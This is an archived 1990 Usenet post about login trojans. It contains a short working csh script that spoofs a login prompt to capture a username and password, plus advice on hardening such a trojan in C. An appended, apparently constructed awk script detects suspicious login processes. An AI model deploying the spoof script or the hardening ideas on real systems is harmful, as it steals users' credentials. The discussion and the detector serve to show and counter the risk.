Path: utzoo!utgpu!news-server.csri.toronto.edu!cs.utexas.edu!uwm.edu!archimedes.math.uwm.edu!jgreco
From: jgreco@archimedes.math.uwm.edu (Joe Greco)
Newsgroups: comp.unix.internals
Subject: Re: Finding Passwords
Keywords: security
Message-ID: <6772@uwm.edu>
Date: 5 Oct 90 01:10:19 GMT
References: <8354@helios.TAMU.EDU> <11133@galbp.LBP.HARRIS.COM> <50845@brunix.UUCP>
Sender: news@uwm.edu
Organization: University of Wisconsin, Milwaukee - Department of Mathematics
Lines: 45

In comp.unix.internals article <50845@brunix.UUCP>, cgy@cs.brown.edu (Curtis Yarvin) wrote:
:You should be able to prevent this. SunOS (and thus likely BSD as well,
:though I don't know) make the first login prompt " login:", and
:switch to plain "login:" if an incorrect password is entered. This disables
:login trojans by making them unconcealable. Alternatively, on at least some
:SysV machines, you can change the first prompt from the soft underbelly of
:"login:" by mucking with /etc/gettydefs (I think /etc/gettytab on BSD is the
:same).

Well, I whipped up the following in about 15 seconds (thought-time that is):
this works very nicely under BSD 4.3.

    #!/bin/csh
    echo `hostname` " - Dept of Mathematics - U.W. Milwaukee"
    echo -n "(tty01) login: "
    set name=$<
    echo -n "Password ... if you dare: "
    set passwd=$<
    echo Login incorrect
    exec /bin/login

Now, a real program would be written in C, block all signals, turn off tty
echo during the password entry... as a matter of fact, you could just get
login.c itself and gut it. Then you could even (easily) make it check the
password. The ideal trojan would probably wait until a valid user/pass
combination was entered before passing off to the Real Thing.

It's always a good idea to not log onto a terminal that's already on....
that's the way this kind of stuff is prevented at UWM, for the most part.
That's not always possible at other sites. :-(

Disclaimer: I am neither a subversive nor an account cracker.
I was just showing a practical example to disprove the above statement.

... Joe

-------------------------------------------------------------------------------
Joe Greco - University of Wisconsin, Milwaukee - Department of Mathematics
jgreco@archimedes.math.uwm.edu          USnail: Joe Greco
Voice: 414/321-6184                             9905 W. Montana Ave.
Data:  414/321-9287 (Happy Hacker's BBS)        West Allis, WI 53227-3329
ICBM:  43 05 20 N 87 53 10 W
#include Disclaimer: I don't speak for the Math Department, the University, or myself.
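
A defender-side check tied to the script's last line (`exec /bin/login`), added here as an example and not part of the original post: it flags any `login` process whose parent is not init, since the hand-off runs inside the session that displayed the fake prompt. It assumes a getty-spawned login is a direct child of PID 1 and that process data arrives as PID PPID TTY COMMAND; the function names and sample lines are constructed.

```shell
#!/bin/sh
# Constructed sample (not captured from a real system).
# Columns: PID PPID TTY COMMAND
sample_ps() {
cat <<'EOF'
PID PPID TTY COMMAND
1 0 ? init
212 1 tty00 getty
305 1 tty02 /bin/login
340 1 tty01 -csh
377 340 tty01 /bin/login
401 1 tty03 -csh
455 401 tty03 vi
EOF
}

# Read ps-style lines on stdin and print one line per login process
# whose parent is not PID 1 (assumption: a console login started by
# getty is a direct child of init).
find_suspect_logins() {
    awk '
        $1 !~ /^[0-9]+$/ { next }            # skip header or junk lines
        { ppid[$1] = $2; tty[$1] = $3; cmd[$1] = $4 }
        END {
            for (p in cmd) {
                name = cmd[p]
                sub(/^.*\//, "", name)       # basename of the command
                if (name != "login" || ppid[p] == 1)
                    continue
                parent = (ppid[p] in cmd) ? cmd[ppid[p]] : "?"
                printf "%s pid=%s parent=%s(%s)\n", tty[p], p, ppid[p], parent
            }
        }' | sort
}

# Demo run on the constructed sample: only the login on tty01, whose
# parent is a user shell, is reported.
sample_ps | find_suspect_logins
```

Logins started by network daemons such as rlogind or telnetd also have a non-init parent, so hits are leads to check against the parent column, not verdicts.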